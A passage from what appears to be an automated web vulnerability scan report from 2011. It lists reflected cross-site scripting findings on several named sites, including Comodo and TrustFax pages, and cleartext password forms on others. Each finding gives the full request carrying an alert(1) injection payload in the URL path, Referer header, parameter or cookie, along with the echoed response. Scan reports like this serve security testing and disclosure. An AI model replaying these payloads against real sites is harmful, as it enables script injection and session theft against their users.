User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:39 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:39 GMT
Content-Length: 9686
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/sitemap"
cache key = "/trustfax/content/sitemap.html4ee13--><img src=a onerror=alert(1)>ade44186370.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "sitemap"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:39.989"
-->
...[SNIP]...

1.41. http://www.trustfax.com/support.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /support.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload d2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 was submitted in the REST URL parameter 1. This input was echoed as d2114--><img src=a onerror=alert(1)>7075d3b5727 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /support.htmld2114--><img%20src%3da%20onerror%3dalert(1)>7075d3b5727 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 28666
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Free Fax Software Online Fax Services from TrustFax"
handle = "/trustfax/content/support"
cache key = "/trustfax/content/support.htmld2114--><img src=a onerror=alert(1)>7075d3b5727.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "support"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.941"
-->
...[SNIP]...

1.42. http://www.trustfax.com/termsandconditions.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /termsandconditions.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload 874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 was submitted in the REST URL parameter 1. This input was echoed as 874a7--><img src=a onerror=alert(1)>4adc5ca8d09 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /termsandconditions.html874a7--><img%20src%3da%20onerror%3dalert(1)>4adc5ca8d09 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:40 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:40 GMT
Content-Length: 58156
X-TWA-Web: pb:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "TrustFax"
handle = "/trustfax/content/termsandconditions"
cache key = "/trustfax/content/termsandconditions.html874a7--><img src=a onerror=alert(1)>4adc5ca8d09.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "termsandconditions"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:40.678"
-->
...[SNIP]...

1.43. http://www.trustfax.com/whytrustfax.html [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.trustfax.com
Path:   /whytrustfax.html

Issue detail

The value of REST URL parameter 1 is copied into an HTML comment. The payload dd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 was submitted in the REST URL parameter 1. This input was echoed as dd3bd--><img src=a onerror=alert(1)>45b34d72443 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /whytrustfax.htmldd3bd--><img%20src%3da%20onerror%3dalert(1)>45b34d72443 HTTP/1.1
Host: www.trustfax.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:07:38 GMT
Server: Apache
X-Magnolia-Registration: Registered
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, post-check=0, pre-check=0
Expires: Fri, 30 Oct 1998 14:19:41 GMT
Last-Modified: Sun, 18 Sep 2011 12:07:38 GMT
Content-Length: 10972
X-TWA-Web: pa:28192
Connection: close
Content-Type: text/html;charset=UTF-8


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>

...[SNIP]...
<!-- Debug Info
id = "TPA2T10"
skin = ""
title = "Fax Email Send Fax Online - Trustfax"
handle = "/trustfax/content/whytrustfax"
cache key = "/trustfax/content/whytrustfax.htmldd3bd--><img src=a onerror=alert(1)>45b34d72443.3f5171393f3f7e3f313f03633f413f3f
   (SSL-Detected=, akamaiCountry=US)"
nodename = "whytrustfax"
template = "trustfaxLeftSidebar"
timestamp = "2011-09-18 05:07:38.940"
-->
...[SNIP]...

1.44. https://cert.webtrust.org/ViewSeal [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://cert.webtrust.org
Path:   /ViewSeal

Issue detail

The value of the Referer HTTP header is copied into the HTML document as plain text between tags. The payload e739f<script>alert(1)</script>4647f9dbaca was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /ViewSeal?id=1082 HTTP/1.1
Host: cert.webtrust.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Referer: http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 09:40:04 GMT
Server: Apache Tomcat/4.0.6 (HTTP/1.1 Connector)
X-Cache: MISS from cert.webtrust.org
Connection: close
Content-Type: text/html
Content-Length: 258

<html>
<head>
<title>Web Trust</title>
<link rel="stylesheet" href="/admin.css" type="text/css">
</head>
<body>
Invalid domain [http://www.google.com/search?hl=en&q=e739f<script>alert(1)</script>4647f9dbaca]: please contact your practitioner.</body>
...[SNIP]...

1.45. https://secure.comodo.net/products/passwordResetRequest [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.comodo.net
Path:   /products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 83de1"><script>alert(1)</script>5fb9e3919804d0d3e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4654363456&loginName=aaa&emailAddress= HTTP/1.1
Host: secure.comodo.net
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e
Cache-Control: max-age=0
Origin: https://secure.comodo.net
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:55:37 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 457
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4654363456</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=83de1"><script>alert(1)</script>5fb9e3919804d0d3e'">
...[SNIP]...

1.46. https://secure.instantssl.com/products/passwordResetRequest [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://secure.instantssl.com
Path:   /products/passwordResetRequest

Issue detail

The value of the Referer HTTP header is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20e00"><script>alert(1)</script>5da064f00b0ed38bb was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/passwordResetRequest?orderNumber=4543252345324523453245&loginName=&emailAddress=4353245 HTTP/1.1
Host: secure.instantssl.com
Connection: keep-alive
Referer: http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb
Cache-Control: max-age=0
Origin: https://secure.instantssl.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1316328656750r0.6942118240986019; __utmx=261615573.; __utmxx=261615573.; optimizelyBuckets=%7B%229298079%22%3A9298080%7D; __utma=261615573.129590781.1316328660.1316328660.1316362417.2; __utmb=261615573; __utmc=261615573; __utmz=261615573.1316362417.2.2.utmccn=(referral)|utmcsr=comodo.com|utmcct=/e-commerce/ssl-certificates/free-ssl-cert.php|utmcmd=referral

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:14:02 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Content-Length: 469
Cache-Control: max-age=-1

<html>
<head>
<title>Password Reset: ERROR!</title>
<link rel="stylesheet" href="/css/css.css">
</head>
<body>
<b>4543252345324523453245</b> is not a valid Order Number.
<br><br><input type="button" class="input" value="&lt; Back" onClick="window.location = 'http://www.google.com/search?hl=en&q=20e00"><script>alert(1)</script>5da064f00b0ed38bb'">
...[SNIP]...

1.47. https://secure.comodo.com/products/!PlaceOrder [errorURL parameter]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://secure.comodo.com
Path:   /products/!PlaceOrder

Issue detail

The value of the errorURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b4151"><script>alert(1)</script>c83876de017faa9a0 was submitted in the errorURL parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The original request used the POST method, however it was possible to convert the request to use the GET method, to enable easier demonstration and delivery of the attack.

Note that the response into which user data is copied is an HTTP redirection. Typically, browsers will not process the contents of the response body in this situation. Unless you can find a way to prevent the application from performing a redirection (for example, by interfering with the response headers), the observed behaviour may not be exploitable in practice. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /products/!PlaceOrder?errorURL=http%3A%2F%2Fhackerguardian.com%2Fpci-compliance%2Faddsupport%2Fssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0&_3_PPP=&_3_location=&_4_PPP=&_4_location=&isReturningCustomer=Y&loginName=324234234&loginPassword=324234234434&vatNumber=&vatStatus=2&currency=&region=&referrerURL=&entryURL=&ap=hackerguardian&successURL=http%3A%2F%2Fwww.hackerguardian.com%2F&_1_PPP=3460&iAgreeToTheTsAndCs=Y&contractSignerName=&contractSignerTitle=&contractSignerTelephoneNumber=&contractSignerEmailAddress=&Submit.x=72&Submit.y=16&Submit=Submit HTTP/1.1
Host: secure.comodo.com
Connection: keep-alive
Referer: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.html
Cache-Control: max-age=0
Origin: http://hackerguardian.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: optimizelyEndUserId=oeu1315419552319r0.6822604623157531; km_ai=nxNThomVDaBwwqN7xx0NPXpwd58%3D; km_lv=1316328762; km_uq=; PHPSESSID=f8719f41bb3d4af1231ab0216071d42d; WRUID=1666513654.2102610049; WRIgnore=true; optimizelyCustomEvents=%7B%228018129%22%3A%5B%22Need%20a%20pc%20expert%20try%20it%20now%20button%22%2C%22Top%20Buy%20Now%22%2C%22SSL%20Security%20(emerchant%20solutions)%22%2C%22banner%22%2C%22top%20menu%22%5D%7D; optimizelyBuckets=%7B%228015120%22%3A8013305%2C%228022314%22%3A8017411%7D; __utma=1.355449779.1315419555.1315419555.1316362394.2; __utmb=1.17.10.1316362394; __utmc=1; __utmz=1.1315419555.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)|utmctr=comodo

Response

HTTP/1.1 302 Found
Server: nginx
Date: Sun, 18 Sep 2011 11:20:45 GMT
Content-Type: text/html; charset=us-ascii
Connection: keep-alive
Keep-Alive: timeout=5
Location: http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.
Content-Length: 448
Cache-Control: max-age=-1

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<HTML><HEAD>
<TITLE>302 Found</TITLE>
</HEAD><BODY>
<H1>Found</H1>
The document has moved <A HREF="http://hackerguardian.com/pci-compliance/addsupport/ssl-purchase.htmlb4151"><script>alert(1)</script>c83876de017faa9a0?errorCode=-4&errorItem=loginName&errorDetail=Password+cannot+contain+the+username.">
...[SNIP]...

1.48. http://www.seeos.com/ [uid cookie]  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.seeos.com
Path:   /

Issue detail

The value of the uid cookie is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 89d07"><script>alert(1)</script>77e368347ea was submitted in the uid cookie. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a cookie, the application's behaviour is not trivial to exploit in an attack against another user. Typically, you will need to find a means of setting an arbitrary cookie value in the victim's browser in order to exploit the vulnerability. This limitation considerably mitigates the impact of the vulnerability.

Request

GET /?f HTTP/1.1
Host: www.seeos.com
Proxy-Connection: keep-alive
Referer: http://www.trustix.com/small/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: uid=89d07"><script>alert(1)</script>77e368347ea

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:08:02 GMT
Server: Apache/2.2.17 (Ubuntu)
X-Powered-By: PHP/5.3.5-1ubuntu7.2
Set-Cookie: uid=89d07%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E77e368347ea; expires=Mon, 19-Sep-2011 12:08:02 GMT
Vary: Accept-Encoding
Content-Length: 865
Connection: close
Content-Type: text/html

<html>
<head>
<title>seeos.com: The Leading See OS Site on the Net</title>
</head>
<frameset cols="1,*,1" border=0>
<frame name="top" src="tg.php?uid=89d07"><script>alert(1)</script>77e368347ea&src=&cat=travel&kw=See+OS&sc=travel" scrolling=no frameborder=0 noresize framespacing=0 marginwidth=0 marginheight=0>
...[SNIP]...

2. Cleartext submission of password  previous  next
There are 23 instances of this issue:

Issue background

Passwords submitted over an unencrypted connection are vulnerable to capture by an attacker who is suitably positioned on the network. This includes any malicious party located on the user's own network, within their ISP, within the ISP used by the application, and within the application's hosting infrastructure. Even if switched networks are employed at some of these locations, techniques exist to circumvent this defence and monitor the traffic passing through switches.

Issue remediation

The application should use transport-level encryption (SSL or TLS) to protect all sensitive communications passing between the client and the server. Communications that should be protected include the login mechanism and related functionality, and any functions where sensitive data can be accessed or privileged actions can be performed. These areas of the application should employ their own session handling mechanism, and the session tokens used should never be transmitted over unencrypted communications. If HTTP cookies are used for transmitting session tokens, then the secure flag should be set to prevent transmission over clear-text HTTP.


2.1. http://forum.psoft.net/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://forum.psoft.net
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: forum.psoft.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sun, 18 Sep 2011 12:33:23 GMT
Server: Apache
Set-Cookie: bb_lastactivity=0; expires=Mon, 17-Sep-2012 12:33:23 GMT; path=/; domain=.psoft.net
Expires: 0
Cache-Control: private, post-check=0, pre-check=0, max-age=0
Pragma: no-cache
Content-Length: 99991
Connection: close
Content-Type: text/html; charset=ISO-8859-1

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en" id="vbulletin_
...[SNIP]...
</script>
           <form id="navbar_loginform" action="login.php?do=login" method="post" onsubmit="md5hash(vb_login_password, vb_login_md5password, vb_login_md5password_utf, 0)">
               <fieldset id="logindetails" class="logindetails">
...[SNIP]...
<input type="text" class="textbox default-value" name="vb_login_username" id="navbar_username" size="10" accesskey="u" tabindex="101" value="User Name" />
                   <input type="password" class="textbox" tabindex="102" name="vb_login_password" id="navbar_password" size="10" />
                   <input type="text" class="textbox default-value" tabindex="102" name="vb_login_password_hint" id="navbar_password_hint" size="10" value="Password" style="display:none;" />
...[SNIP]...

2.2. http://www.vengine.com/  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET / HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:38:35 GMT
Content-Type: text/html
Content-Length: 11760
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><head>
<title>Anti Phishing Site
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.3. http://www.vengine.com/corporate/about.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/about.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /corporate/about.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/support/index.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.4.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:29 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10580

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Vengine.com - Ant
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.4. http://www.vengine.com/corporate/contact.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /corporate/contact.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /corporate/contact.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/corporate/about.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=252787086.1679413329.1316363998.1316363998.1316363998.1; __utmb=252787086.5.10.1316363998; __utmc=252787086; __utmz=252787086.1316363998.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 11:39:31 GMT
Content-Type: text/html
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: keep-alive
Keep-Alive: timeout=5
Vary: Accept-Encoding
Content-Length: 10627

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Software
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.5. http://www.vengine.com/products/best_practices.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/best_practices.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/best_practices.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:12 GMT
Content-Type: text/html
Content-Length: 20164
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Phishing Protecti
...[SNIP]...
<div id="login" style="top: 46px;">
<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.6. http://www.vengine.com/products/features.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/features.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/features.html HTTP/1.1
Host: www.vengine.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: nginx
Date: Sun, 18 Sep 2011 12:07:10 GMT
Content-Type: text/html
Content-Length: 13411
Last-Modified: Mon, 17 Jan 2011 23:55:32 GMT
Connection: close
Vary: Accept-Encoding
Accept-Ranges: bytes

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Website Authentic
...[SNIP]...
<div id="login" style="top: 46px;">

<form name="loginForm" method="post" action="//secure.comodo.com/products/!hostedLogin"
onsubmit="return submitLoginForm(this.loginName, this.loginPassword)">

Member Login <input name="login" id="loginName" size="10" type="text" />
<input size="10" onfocus="this.select()" name="password" id="loginPassword" type="password" />
<input value="US" name="country" type="hidden" />
...[SNIP]...

2.7. http://www.vengine.com/products/free_tools.html  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.vengine.com
Path:   /products/free_tools.html

Issue detail

The page contains a form with the following action URL, which is submitted over clear-text HTTP:The form contains the following password field:

Request

GET /products/free_tools.html HTTP/1.1
Host: www.vengine.com
Proxy-Connection: keep-alive
Referer: http://www.vengine.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
